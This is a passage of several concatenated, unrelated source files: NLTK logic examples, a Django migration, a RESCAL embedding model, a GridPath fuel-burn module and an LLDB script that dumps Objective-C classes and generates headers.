path in reciprocal space. """ return np.asarray(self._data['kpoint_path']) @property def kpoint_weights(self): if 'kpoint_weights' in self._data: return np.asarray(self._data['kpoint_weights']) return None @property def kpoint_path_cartesian(self): """ The reicprocal space sampling path in Cartesian coordinates. """ return np.asarray(frac2cart(real2recip(self.lattice_cart), self.kpoint_path)) @property def num_spins(self): """ Dummy number of spins. """ return 1 @property def spin_fermi_energy(self): """ Dummy Fermi energy per spin channel. 
""" return [0] Old-First-Edition/source_code/Ch07_Semantic_and_Sentiment_Analysis/semantic_representations.py # -*- coding: utf-8 -*- """ Created on Sun Sep 25 18:46:04 2016 @author: DIP """ import nltk import pandas as pd import os symbol_P = 'P' symbol_Q = 'Q' proposition_P = 'He is hungry' propositon_Q = 'He will eat a sandwich' p_statuses = [False, False, True, True] q_statuses = [False, True, False, True] conjunction = '(P & Q)' disjunction = '(P | Q)' implication = '(P -> Q)' equivalence = '(P <-> Q)' expressions = [conjunction, disjunction, implication, equivalence] results = [] for status_p, status_q in zip(p_statuses, q_statuses): dom = set([]) val = nltk.Valuation([(symbol_P, status_p), (symbol_Q, status_q)]) assignments = nltk.Assignment(dom) model = nltk.Model(dom, val) row = [status_p, status_q] for expression in expressions: result = model.evaluate(expression, assignments) row.append(result) results.append(row) columns = [symbol_P, symbol_Q, conjunction, disjunction, implication, equivalence] result_frame = pd.DataFrame(results, columns=columns) print 'P:', proposition_P print 'Q:', propositon_Q print print 'Expression Outcomes:-' print result_frame # first order logic read_expr = nltk.sem.Expression.fromstring os.environ['PROVER9'] = r'E:/prover9/bin' prover = nltk.Prover9() prover = nltk.ResolutionProver() # set the rule expression rule = read_expr('all x. all y. (jumps_over(x, y) -> -jumps_over(y, x))') # set the event occured event = read_expr('jumps_over(fox, dog)') # set the outcome we want to evaluate -- the goal test_outcome = read_expr('jumps_over(dog, fox)') # get the result prover.prove(goal=test_outcome, assumptions=[event, rule], verbose=True) # set the rule expression rule = read_expr('all x. (studies(x, exam) -> pass(x, exam))') # set the events and outcomes we want to determine event1 = read_expr('-studies(John, exam)') test_outcome1 = read_expr('pass(John, exam)') event2 = read_expr('studies(Pierre, exam)') test_outcome2 = read_expr('pass(Pierre, exam)') prover.prove(goal=test_outcome1, assumptions=[event1, rule], verbose=True) prover.prove(goal=test_outcome2, assumptions=[event2, rule], verbose=True) # define symbols (entities\functions) and their values rules = """ rover => r felix => f garfield => g alex => a dog => {r, a} cat => {g} fox => {f} runs => {a, f} sleeps => {r, g} jumps_over => {(f, g), (a, g), (f, r), (a, r)} """ val = nltk.Valuation.fromstring(rules) print val dom = {'r', 'f', 'g', 'a'} m = nltk.Model(dom, val) print m.evaluate('jumps_over(felix, rover) & dog(rover) & runs(rover)', None) print m.evaluate('jumps_over(felix, rover) & dog(rover) & -runs(rover)', None) print m.evaluate('jumps_over(alex, garfield) & dog(alex) & cat(garfield) & sleeps(garfield)', None) g = nltk.Assignment(dom, [('x', 'r'), ('y', 'f')]) print m.evaluate('runs(y) & jumps_over(y, x) & sleeps(x)', g) print m.evaluate('exists y. 
(fox(y) & runs(y))', g) formula = read_expr('runs(x)') print m.satisfiers(formula, 'x', g) formula = read_expr('runs(x) & fox(x)') print m.satisfiers(formula, 'x', g) backend/api/migrations/0008_auto_20191205_2152.py # Generated by Django 2.2.6 on 2019-12-05 21:52 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('api', '0007_auto_20191204_1744'), ] operations = [ migrations.AlterModelOptions( name='post', options={'ordering': ['date']}, ), ] kge/model/rescal.py import math import torch from kge import Config, Dataset from kge.model.kge_model import KgeEmbedder, KgeModel, RelationalScorer class RescalScorer(RelationalScorer): r"""Implementation of the RESCAL KGE scorer.""" def __init__(self, config: Config, dataset: Dataset, configuration_key=None): super().__init__(config, dataset, configuration_key) def score_emb( self, s_emb: torch.Tensor, p_emb: torch.Tensor, o_emb: torch.Tensor, combine: str, ): batch_size = p_emb.size(0) entity_size = s_emb.size(-1) # reshape relation embeddings to obtain mixing matrices for RESCAL p_mixmat = p_emb.view(-1, entity_size, entity_size) if combine == "spo": out = ( s_emb.unsqueeze(1) # [batch x 1 x entity_size] .bmm(p_mixmat) # apply mixing matrices .view(batch_size, entity_size) # drop dim 1 * o_emb # apply object embeddings ).sum( dim=-1 ) # and sum to obtain predictions elif combine == "sp_": out = ( s_emb.unsqueeze(1) .bmm(p_mixmat) .view(batch_size, entity_size) .mm(o_emb.transpose(0, 1)) ) elif combine == "_po": out = ( p_mixmat.bmm(o_emb.unsqueeze(2)) .view(batch_size, entity_size) .mm(s_emb.transpose(0, 1)) ) else: out = super().score_emb(s_emb, p_emb, o_emb, combine) return out.view(batch_size, -1) class Rescal(KgeModel): r"""Implementation of the RÉSCAL KGE model.""" def __init__(self, config: Config, dataset: Dataset, configuration_key=None): self._init_configuration(config, configuration_key) rescal_set_relation_embedder_dim( config, dataset, self.configuration_key + ".relation_embedder" ) super().__init__( config, dataset, RescalScorer, configuration_key=self.configuration_key ) def rescal_set_relation_embedder_dim(config, dataset, rel_emb_conf_key): """Set the relation embedder dimensionality for RESCAL in the config. If <0, set it to the square of the size of the entity embedder. Else leave unchanged. """ dim = config.get_default(rel_emb_conf_key + ".dim") if dim < 0: # autodetect relation embedding dimensionality ent_emb_conf_key = rel_emb_conf_key.replace( "relation_embedder", "entity_embedder" ) if ent_emb_conf_key == rel_emb_conf_key: raise ValueError( "Cannot determine relation embedding size; please set manually." ) dim = config.get_default(ent_emb_conf_key + ".dim") ** 2 config.set(rel_emb_conf_key + ".dim", dim, log=True) souissim/gridpath # Copyright 2016-2022 Blue Marble Analytics LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Aggregate fuel burn from the project-timepoint level to fuel / fuel balancing area - period level. 
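The aggregate is exposed as the Total_Horizon_Fuel_Burn_By_Fuel_and_Fuel_BA_Unit
expression and recorded in the fuel_burn_balance_components dynamic list
(see record_dynamic_components below).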
""" import csv import os.path from pyomo.environ import Param, Set, Expression from gridpath.auxiliary.dynamic_components import fuel_burn_balance_components def add_model_components(m, d, scenario_directory, subproblem, stage): """ :param m: :param d: :return: """ m.PRJ_FUEL_BURN_LIMIT_BAS = Set(dimen=3) m.PRJ_FUELS_WITH_LIMITS = Set( dimen=2, within=m.PROJECTS * m.FUELS, initialize=lambda mod: set( [(prj, f) for (prj, f, ba) in mod.PRJ_FUEL_BURN_LIMIT_BAS] ), ) m.FUEL_PRJS_FUEL_WITH_LIMITS_OPR_TMPS = Set( dimen=3, initialize=lambda mod: [ (prj, f, tmp) for (prj, f, tmp) in mod.FUEL_PRJS_FUEL_OPR_TMPS if (prj, f) in mod.PRJ_FUELS_WITH_LIMITS ], ) m.PRJS_BY_FUEL_BA = Set( m.FUEL_BURN_LIMIT_BAS, within=m.FUEL_PRJS, initialize=lambda mod, f, ba: [ prj for (prj, fuel, bln_a) in mod.PRJ_FUEL_BURN_LIMIT_BAS if f == fuel and ba == bln_a ], ) def total_period_fuel_burn_by_fuel_burn_limit_ba_rule(mod, f, ba, bt, h): """ Calculate total fuel burn from all projects in a fuel / fuel balancing area. :param mod: :param z: :param p: :return: """ return sum( ( mod.Total_Fuel_Burn_by_Fuel_MMBtu[prj, fuel, tmp] - mod.Project_Fuel_Contribution_by_Fuel[prj, fuel, tmp] ) * mod.hrs_in_tmp[tmp] * mod.tmp_weight[tmp] for (prj, fuel, tmp) in mod.FUEL_PRJS_FUEL_WITH_LIMITS_OPR_TMPS if prj in mod.PRJS_BY_FUEL_BA[f, ba] # find projects for this fuel/BA and fuel == f # only get the fuel burn for this fuel and tmp in mod.TMPS_BY_BLN_TYPE_HRZ[bt, h] # only tmps in relevant horizon ) m.Total_Horizon_Fuel_Burn_By_Fuel_and_Fuel_BA_Unit = Expression( m.FUEL_FUEL_BA_BLN_TYPE_HRZS_WITH_FUEL_BURN_LIMIT, rule=total_period_fuel_burn_by_fuel_burn_limit_ba_rule, ) record_dynamic_components(dynamic_components=d) def record_dynamic_components(dynamic_components): """ :param dynamic_components: This method adds project emissions to carbon balance """ getattr(dynamic_components, fuel_burn_balance_components).append( "Total_Horizon_Fuel_Burn_By_Fuel_and_Fuel_BA_Unit" ) # Input-Output ############################################################################### def load_model_data(m, d, data_portal, scenario_directory, subproblem, stage): """ :param m: :param d: :param data_portal: :param scenario_directory: :param subproblem: :param stage: :return: """ data_portal.load( filename=os.path.join( scenario_directory, str(subproblem), str(stage), "inputs", "project_fuel_burn_limit_bas.tab", ), set=m.PRJ_FUEL_BURN_LIMIT_BAS, ) # Database ############################################################################### def get_inputs_from_database(scenario_id, subscenarios, subproblem, stage, conn): """ :param subscenarios: SubScenarios object with all subscenario info :param subproblem: :param stage: :param conn: database connection :return: """ subproblem = 1 if subproblem == "" else subproblem stage = 1 if stage == "" else stage c = conn.cursor() # TODO: do we need additional filtering project_fuel_bas = c.execute( """SELECT project, fuel, fuel_burn_limit_ba FROM -- Get projects from portfolio only (SELECT project FROM inputs_project_portfolios WHERE project_portfolio_scenario_id = {project_portfolio_scenario_id} ) as prj_tbl LEFT OUTER JOIN -- Get fuels and BAs for those projects (SELECT project, fuel, fuel_burn_limit_ba FROM inputs_project_fuel_burn_limit_balancing_areas WHERE project_fuel_burn_limit_ba_scenario_id = {project_fuel_burn_limit_ba_scenario_id} ) as prj_cc_zone_tbl USING (project) -- Filter out projects whose fuel and BA is not one included in -- our fuel_burn_limit_ba_scenario_id INNER JOIN ( SELECT fuel, fuel_burn_limit_ba 
FROM inputs_geography_fuel_burn_limit_balancing_areas WHERE fuel_burn_limit_ba_scenario_id = {fuel_burn_limit_ba_scenario_id}) USING (fuel, fuel_burn_limit_ba); """.format( project_portfolio_scenario_id=subscenarios.PROJECT_PORTFOLIO_SCENARIO_ID, project_fuel_burn_limit_ba_scenario_id=subscenarios.PROJECT_FUEL_BURN_LIMIT_BA_SCENARIO_ID, fuel_burn_limit_ba_scenario_id=subscenarios.FUEL_BURN_LIMIT_BA_SCENARIO_ID, ) ) return project_fuel_bas def write_model_inputs( scenario_directory, scenario_id, subscenarios, subproblem, stage, conn ): """ Get inputs from database and write out the model input projects.tab file (to be precise, amend it). :param scenario_directory: string, the scenario directory :param subscenarios: SubScenarios object with all subscenario info :param subproblem: :param stage: :param conn: database connection :return: """ project_fuel_bas = get_inputs_from_database( scenario_id, subscenarios, subproblem, stage, conn ) with open( os.path.join( scenario_directory, str(subproblem), str(stage), "inputs", "project_fuel_burn_limit_bas.tab", ), "w", newline="", ) as projects_file_out: writer = csv.writer(projects_file_out, delimiter="\t", lineterminator="\n") # Write header writer.writerow(["project", "fuel", "fuel_burn_limit_ba"]) for row in project_fuel_bas: writer.writerow(row) # MIT License # Copyright (c) 2017 # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import lldb import ds import os import shlex import optparse import datetime import lldb.utils.symbolication def __lldb_init_module(debugger, internal_dict): debugger.HandleCommand( 'command script add -f dclass.dclass dclass -h "Dumps info about objc/swift classes"') def dclass(debugger, command, exe_ctx, result, internal_dict): ''' Dumps all the NSObject inherited classes in the process. If you give it a module, it will dump only the classes within that module. You can also filter out classes to only a certain type and can also generate a header file for a specific class. 
Example: # Dump ALL the NSObject classes within the process (lldb) dclass # Dump all the classes that are a UIViewController within the process (lldb) dclass -f UIViewController # Dump all the classes with the regex case insensitive search "viewcontroller" in the class name (lldb) dclass -r (?i)viewCoNtrolLer # Dump all the classes within the UIKit module (lldb) dclass -m UIKit # Dump all classes in CKConfettiEffect NSBundle that are UIView subclasses (lldb) dclass /System/Library/Messages/iMessageEffects/CKConfettiEffect.bundle/CKConfettiEffect -f UIView # Generate a header file for the class specified: (lldb) dclass -g UIView # Generate a protocol that you can cast an object to. Ideal when working with private classes at dev time (lldb) dclass -P UIView # Dump all classes and methods for a particular module, ideal for viewing changes in frameworks over time (lldb) dclass -o UIKit # Only dump classes whose superclass is of type class and in UIKit module. Ideal for going after specific classes (lldb) dclass -s NSObject -m UIKit ''' command_args = shlex.split(command, posix=False) parser = generate_option_parser() try: (options, args) = parser.parse_args(command_args) except: result.SetError(parser.usage) return if not args: # result.SetError('Usage: find NSObjectSubclass\n\nUse \'help find\' for more details') clean_command = None # return if not args and options.generate_header: result.SetError('Need to supply class for option') return else: clean_command = ('').join(args) res = lldb.SBCommandReturnObject() interpreter = debugger.GetCommandInterpreter() target = exe_ctx.target if not options.info and not options.class_type and not options.verbose and not options.regular_expression and not options.module and not options.filter and not options.search_protocols and not options.dump_code_output and not options.generate_header and not options.verbose_info and not options.generate_protocol and not options.conforms_to_protocol and not options.superclass and len(args) == 1: options.info = args[0] if options.info or options.verbose_info: script = generate_class_info(options) # print(script) # return interpreter.HandleCommand('expression -lobjc -O -- ' + script, res) if res.GetError(): result.SetError(res.GetError()) return contents = res.GetOutput() result.AppendMessage(contents) return elif options.dump_code_output: directory = '/tmp/{}_{}/'.format(target.executable.basename, datetime.datetime.now().time()) os.makedirs(directory) modules = target.modules if len(args) > 0 and args[0] == '__all': os.makedirs(directory + 'PrivateFrameworks') os.makedirs(directory + 'Frameworks') modules = [i for i in target.modules if '/usr/lib/' not in i.file.fullpath and '__lldb_' not in i.file.fullpath] outputMsg = "Dumping all private Objective-C frameworks" elif len(args) > 0 and args[0]: module = target.module[args[0]] if module is None: result.SetError( "Unable to open module name '{}', to see list of images use 'image list -b'".format(args[0])) return modules = [module] outputMsg = "Dumping all private Objective-C frameworks" else: modules = [target.module[target.executable.fullpath]] for module in modules: command_script = generate_module_header_script(options, module.file.fullpath.replace('//', '/')) interpreter.HandleCommand('expression -lobjc -O -u0 -- ' + command_script, res) # debugger.HandleCommand('expression -lobjc -O -- ' + command_script) if '/System/Library/PrivateFrameworks/' in module.file.fullpath: subdir = 'PrivateFrameworks/' elif '/System/Library/Frameworks/' in module.file.fullpath: subdir 
= 'Frameworks/' else: subdir = '' ds.create_or_touch_filepath(directory + subdir + module.file.basename + '.txt', res.GetOutput()) print('Written output to: ' + directory + '... opening file') os.system('open -R ' + directory) return if options.module is not None: options.module = options.module.strip("\"\'") module = target.FindModule(lldb.SBFileSpec(options.module)) if not module.IsValid(): if not module or not module.IsValid(): result.SetError( "Unable to open module name '{}', to see list of images use 'image list -b'".format(str(options.module))) return if options.conforms_to_protocol is not None: interpreter.HandleCommand('expression -lobjc -O -- (id)NSProtocolFromString(@\"{}\")'.format(options.conforms_to_protocol), res) if 'nil' in res.GetOutput() or not res.GetOutput(): result.SetError("No such Protocol name '{}'".format(options.conforms_to_protocol)) return res.Clear() if options.generate_header or options.generate_protocol: command_script = generate_header_script(options, clean_command) else: command_script = generate_class_dump(target, options, clean_command) if options.generate_header or options.generate_protocol: interpreter.HandleCommand('expression -lobjc -O -- (Class)NSClassFromString(@\"{}\")'.format(clean_command), res) if 'nil' in res.GetOutput(): result.SetError('Can\'t find class named "{}". Womp womp...'.format(clean_command)) return res.Clear() if options.generate_protocol: filepath = "/tmp/DS_" + clean_command + "Protocol.h" else: filepath = "/tmp/" + clean_command + ".h" interpreter.HandleCommand('expression -lobjc -O -- ' + command_script, res) # debugger.HandleCommand('expression -lobjc -O -g -- ' + command_script) if res.GetError(): result.SetError(res.GetError()) return contents = res.GetOutput() ds.create_or_touch_filepath(filepath, contents) print('Written output to: ' + filepath + '... 
opening file') os.system('open -R ' + filepath) else: msg = "Dumping protocols" if options.search_protocols else "Dumping classes" result.AppendMessage(ds.attrStr(msg, 'cyan')) interpreter.HandleCommand('expression -lobjc -O -- ' + command_script, res) # debugger.HandleCommand('expression -lobjc -O -g -- ' + command_script) if res.GetError(): result.SetError(ds.attrStr(res.GetError(), 'red')) return result.AppendMessage(ds.attrStr('************************************************************', 'cyan')) if res.Succeeded(): result.AppendMessage(res.GetOutput()) def generate_class_dump(target, options, clean_command=None): command_script = r''' @import ObjectiveC; @import Foundation; unsigned int count = 0; typedef struct ds_cls_struct { void *isa; void *supercls; void *buckets; uint32_t _mask; uint32_t _occupied; uintptr_t bits; } ds_cls_struct; ''' if options.search_protocols: command_script += 'Protocol **allProtocols = objc_copyProtocolList(&count);\n' elif clean_command: command_script += ' const char **allClasses = objc_copyClassNamesForImage("' + clean_command + '", &count);' else: command_script += 'Class *allClasses = objc_copyClassList(&count);\n' if options.regular_expression is not None: command_script += ' NSRegularExpression *regex = [NSRegularExpression regularExpressionWithPattern:@"' + options.regular_expression + '" options:0 error:nil];\n' if options.search_protocols: command_script += ''' NSMutableString *classesString = [NSMutableString string]; for (int i = 0; i < count; i++) { Protocol *ptl = allProtocols[i]; ''' else: command_script += ''' NSMutableString *classesString = [NSMutableString string]; for (int i = 0; i < count; i++) { Class cls = ''' command_script += 'objc_getClass(allClasses[i]);' if clean_command else 'allClasses[i];' command_script += ''' NSString *dsclsName = (NSString*)NSStringFromClass(cls); if ((BOOL)[dsclsName isEqualToString:@"_CNZombie_"] || (BOOL)[dsclsName isEqualToString:@"JSExport"] || (BOOL)[dsclsName isEqualToString:@"__NSGenericDeallocHandler"] || (BOOL)[dsclsName isEqualToString:@"_NSZombie_"] || (BOOL)[dsclsName isEqualToString:@"__NSMessageBuilder"] || (BOOL)[dsclsName isEqualToString:@"Object"] ) { continue; } ''' if options.module is not None: command_script += generate_module_search_sections_string(options.module, target, options.search_protocols) if not options.search_protocols and options.conforms_to_protocol is not None: command_script += 'if (!class_conformsToProtocol(cls, NSProtocolFromString(@"'+ options.conforms_to_protocol + '"))) { continue; }' if options.search_protocols: command_script += ' NSString *clsString = (NSString *)NSStringFromProtocol(ptl);\n' else: command_script += ' NSString *clsString = (NSString *)NSStringFromClass(cls);\n' if options.regular_expression is not None: command_script += r''' NSUInteger matches = (NSUInteger)[regex numberOfMatchesInString:clsString options:0 range:NSMakeRange(0, [clsString length])]; if (matches == 0) { continue; } ''' if options.class_type == 'objc': command_script += ' if ((((ds_cls_struct *)cls)->bits & 1UL) == 1) { continue; }\n' if options.class_type == 'swift': command_script += 'if ((((ds_cls_struct *)cls)->bits & 1UL) == 0) { continue; }\n' if not options.search_protocols and options.superclass is not None: command_script += 'NSString *parentClassName = @"' + options.superclass + '";' command_script += r''' if (!(BOOL)[NSStringFromClass((Class)[cls superclass]) isEqualToString:parentClassName]) { continue; } ''' if not options.search_protocols and options.filter is 
None: if options.verbose: command_script += r''' NSString *imageString = [[[[NSString alloc] initWithUTF8String:class_getImageName(cls)] lastPathComponent] stringByDeletingPathExtension]; [classesString appendString:imageString]; [classesString appendString:@": "]; ''' command_script += r''' [classesString appendString:(NSString *)clsString]; [classesString appendString:@"\n"]; } ''' command_script += '\n free(allClasses);\n [classesString description];' elif not options.search_protocols: command_script += '\n if ((BOOL)[cls respondsToSelector:@selector(isSubclassOfClass:)] && (BOOL)[cls isSubclassOfClass:(Class)NSClassFromString(@"' + str(options.filter) + '")]) {\n' if options.verbose: command_script += r''' NSString *imageString = [[[[NSString alloc] initWithUTF8String:class_getImageName(cls)] lastPathComponent] stringByDeletingPathExtension]; [classesString appendString:imageString]; [classesString appendString:@": "]; ''' command_script += r''' [classesString appendString:(NSString *)clsString]; [classesString appendString:@"\n"]; } }''' command_script += '\n free(allClasses);\n [classesString description];' else: command_script += r''' [classesString appendString:(NSString *)clsString]; [classesString appendString:@"\n"]; }''' command_script += '\n free(allProtocols);\n [classesString description];' return command_script def generate_module_search_sections_string(module_name, target, useProtocol=False): module = target.FindModule(lldb.SBFileSpec(module_name)) if not module.IsValid(): result.SetError( "Unable to open module name '{}', to see list of images use 'image list -b'".format(module_name)) return if useProtocol: returnString = r''' uintptr_t addr = (uintptr_t)ptl; if (!(''' else: returnString = r''' uintptr_t addr = (uintptr_t)cls; if (!(''' section = module.FindSection("__DATA") for idx, subsec in enumerate(section): lower_bounds = subsec.GetLoadAddress(target) upper_bounds = lower_bounds + subsec.file_size if idx != 0: returnString += ' || ' returnString += '({} <= addr && addr <= {})'.format(lower_bounds, upper_bounds) dirtysection = module.FindSection("__DATA_DIRTY") for subsec in dirtysection: lower_bounds = subsec.GetLoadAddress(target) upper_bounds = lower_bounds + subsec.file_size returnString += ' || ({} <= addr && addr <= {})'.format(lower_bounds, upper_bounds) returnString += ')) { continue; }\n' return returnString def generate_header_script(options, class_to_generate_header): script = '@import @ObjectiveC;\n' script += 'NSString *className = @"' + str(class_to_generate_header) + '";\n' script += r''' //Dang it. LLDB JIT Doesn't like NSString stringWithFormat on device. 
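// property_getAttributes() yields a comma-separated encoding such as
//   T@"NSString",&,N,V_name
// where T = type, & = strong, W = weak, N = nonatomic, G/S = custom
// getter/setter name, and V = backing ivar; the NSScanner loop below
// walks these tokens to rebuild the @property declaration.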
Need to use stringByAppendingString instead // Runtime declarations in case we're running on a stripped executable typedef struct objc_method *Method; typedef struct objc_ivar *Ivar; // typedef struct objc_category *Category; typedef struct objc_property *objc_property_t; NSMutableString *returnString = [NSMutableString string]; // Properties NSMutableString *generatedProperties = [NSMutableString string]; NSMutableSet *blackListMethodNames = [NSMutableSet set]; NSMutableSet *exportedClassesSet = [NSMutableSet set]; NSMutableSet *exportedProtocolsSet = [NSMutableSet set]; [blackListMethodNames addObjectsFromArray:@[@".cxx_destruct", @"dealloc"]]; unsigned int propertyCount = 0; Class cls = NSClassFromString(className); objc_property_t *properties = (objc_property_t *)class_copyPropertyList(cls, &propertyCount); NSCharacterSet *charSet = [NSCharacterSet characterSetWithCharactersInString:@","]; NSString *(^argumentBlock)(NSString *) = ^(NSString *arg) { if ([arg isEqualToString:@"@"]) { return @"id"; } else if ([arg isEqualToString:@"v"]) { return @"void"; } else if ([arg hasPrefix:@"{CGRect"]) { return @"CGRect"; } else if ([arg hasPrefix:@"{CGPoint"]) { return @"CGPoint"; } else if ([arg hasPrefix:@"{CGSize"]) { return @"CGSize"; } else if ([arg isEqualToString:@"q"]) { return @"NSInteger"; } else if ([arg isEqualToString:@"B"]) { return @"BOOL"; } else if ([arg isEqualToString:@":"]) { return @"SEL"; } else if ([arg isEqualToString:@"d"]) { return @"CGFloat"; } else if ([arg isEqualToString:@"@?"]) { // A block? return @"id"; } return @"void *"; }; NSMutableSet *blackListPropertyNames = [NSMutableSet setWithArray:@[@"hash", @"superclass", @"class", @"description", @"debugDescription"]]; for (int i = 0; i < propertyCount; i++) { objc_property_t property = properties[i]; NSString *attributes = [NSString stringWithUTF8String:(char *)property_getAttributes(property)]; NSString *name = [NSString stringWithUTF8String:(char *)property_getName(property)]; if ([blackListPropertyNames containsObject:name]) { continue; } NSMutableString *generatedPropertyString = [NSMutableString stringWithString:@"@property ("]; NSScanner *scanner = [[NSScanner alloc] initWithString:attributes]; [scanner setCharactersToBeSkipped:charSet]; BOOL multipleOptions = 0; NSString *propertyType; NSString *parsedInput; while ([scanner scanUpToCharactersFromSet:charSet intoString:&parsedInput]) { if ([parsedInput isEqualToString:@"N"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"nonatomic"]; multipleOptions = 1; } else if ([parsedInput isEqualToString:@"W"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"weak"]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"G"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:(NSString *)@"getter="]; [generatedPropertyString appendString:(NSString *)[parsedInput substringFromIndex:1]]; [blackListMethodNames addObject:[parsedInput substringFromIndex:1]]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"S"]) { if (multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:(NSString *)@"setter="]; [generatedPropertyString appendString:(NSString *)[parsedInput substringFromIndex:1]]; [blackListMethodNames addObject:[parsedInput substringFromIndex:1]]; multipleOptions = 1; } else if ([parsedInput isEqualToString:@"&"]) { if 
(multipleOptions) { [generatedPropertyString appendString:@", "]; } [generatedPropertyString appendString:@"strong"]; multipleOptions = 1; } else if ([parsedInput hasPrefix:@"V"]) { // ivar name here, V_name } else if ([parsedInput hasPrefix:@"T"]) { // Type here, T@"NSString" if ( (BOOL)[[[parsedInput substringToIndex:2] substringFromIndex:1] isEqualToString: @"@"]) { // It's a NSObject NSString *tmpPropertyType = [parsedInput substringFromIndex:1]; NSArray *propertyComponents = [tmpPropertyType componentsSeparatedByString:@"\""]; if ([propertyComponents count] > 1) { NSString *component = (NSString *)[propertyComponents objectAtIndex:1]; component = [component stringByReplacingOccurrencesOfString:@"><" withString:@", "]; if ([component hasPrefix:@"<"]) { propertyType = (NSString *)[@"id" stringByAppendingString:component]; NSString *formatted = [[component stringByReplacingOccurrencesOfString:@"<" withString:@""] stringByReplacingOccurrencesOfString:@">" withString:@""]; for (NSString *f in [formatted componentsSeparatedByString:@", "]) { [exportedProtocolsSet addObject:f]; } } else { [exportedClassesSet addObject:component]; propertyType = (NSString *)[component stringByAppendingString:@"*"]; } } else { propertyType = @"id"; } } else { propertyType = argumentBlock([parsedInput substringFromIndex:1]); } } } [generatedPropertyString appendString:(NSString *)[(NSString *)[(NSString *)[(NSString *)[@") " stringByAppendingString:propertyType] stringByAppendingString:@" "] stringByAppendingString:name] stringByAppendingString:@";\n"]]; [generatedProperties appendString:generatedPropertyString]; [blackListMethodNames addObject:name]; } NSMutableArray *tmpSetArray = [NSMutableArray array]; for (NSString *propertyName in [blackListMethodNames allObjects]) { NSString *setter = (NSString *)[@"set" stringByAppendingString:(NSString *)[(NSString *)[(NSString *)[[propertyName substringToIndex:1] uppercaseString] stringByAppendingString:[propertyName substringFromIndex:1]] stringByAppendingString:@":"]]; [tmpSetArray addObject:setter]; } [blackListMethodNames addObjectsFromArray:tmpSetArray]; NSString *(^generateMethodsForClass)(Class) = ^(Class cls) { NSMutableString* generatedMethods = [NSMutableString stringWithString:@""]; unsigned int classCount = 0; Method *methods = (Method *)class_copyMethodList(cls, &classCount); NSString *classOrInstanceStart = (BOOL)class_isMetaClass(cls) ? 
@"+" : @"-"; for (int i = 0; i < classCount; i++) { Method m = methods[i]; NSString *methodName = NSStringFromSelector((char *)method_getName(m)); if ([blackListMethodNames containsObject:methodName]) { continue; } NSMutableString *generatedMethodString = [NSMutableString stringWithString:classOrInstanceStart]; char *retType = (char *)method_copyReturnType(m); NSString *retTypeString = [NSString stringWithUTF8String:retType]; free(retType); unsigned int arguments = (unsigned int)method_getNumberOfArguments(m); [generatedMethodString appendString:(NSString *)[(NSString *)[@"(" stringByAppendingString:argumentBlock(retTypeString)] stringByAppendingString:@")"]]; NSArray *methodComponents = [methodName componentsSeparatedByString:@":"]; NSMutableString *realizedMethod = [NSMutableString stringWithString:@""]; for (int j = 2; j < arguments; j++) { // id, sel, always int index = j - 2; [realizedMethod appendString:(NSString *)[methodComponents[index] stringByAppendingString:@":"]]; char *argumentType = (char *)method_copyArgumentType(m, j); NSString *argumentTypeString = [NSString stringWithUTF8String:argumentType]; free(argumentType); [realizedMethod appendString:(NSString *)[(NSString *)[@"(" stringByAppendingString:argumentBlock(argumentTypeString)] stringByAppendingString:@")"]]; [realizedMethod appendString:@"arg"]; [realizedMethod appendString:[@(index) stringValue]]; [realizedMethod appendString:@" "]; } [generatedMethodString appendString:realizedMethod]; if (arguments == 2) { [generatedMethodString appendString:methodName]; } [generatedMethods appendString:(NSString *)[generatedMethodString stringByAppendingString:@";\n"]]; } free(methods); return generatedMethods; }; // Instance Methods NSString *generatedInstanceMethods = generateMethodsForClass((Class)cls); // Class Methods Class metaClass = (Class)objc_getMetaClass((char *)class_getName(cls)); NSString *generatedClassMethods = generateMethodsForClass(metaClass); NSMutableString *finalString = [NSMutableString string]; [finalString appendString:@"#import \n\n"]; if ([exportedClassesSet count] > 0) { NSMutableString *importString = [NSMutableString string]; [importString appendString:@"@class "]; for (NSString *str in [exportedClassesSet allObjects]) { [importString appendString:str]; [importString appendString:@", "]; } [importString appendString:@";"]; NSString *finalImport = [importString stringByReplacingOccurrencesOfString:@", ;" withString:@";\n\n"]; [finalString appendString:finalImport]; } if ([exportedProtocolsSet count] > 0) { NSMutableString *importString = [NSMutableString string]; [importString appendString:@"@protocol "]; for (NSString *str in [exportedProtocolsSet allObjects]) { [importString appendString:str]; [importString appendString:@", "]; } [importString appendString:@";"]; NSString *finalImport = [importString stringByReplacingOccurrencesOfString:@", ;" withString:@";\n\n"]; [finalString appendString:finalImport]; }''' if options.generate_protocol: script += r''' [finalString appendString:@"\n@protocol DS_"]; [finalString appendString:(NSString *)[cls description]]; [finalString appendString:@"Protocol "];''' else: script += r''' [finalString appendString:@"\n@interface "]; [finalString appendString:(NSString *)[cls description]]; [finalString appendString:@" : "]; [finalString 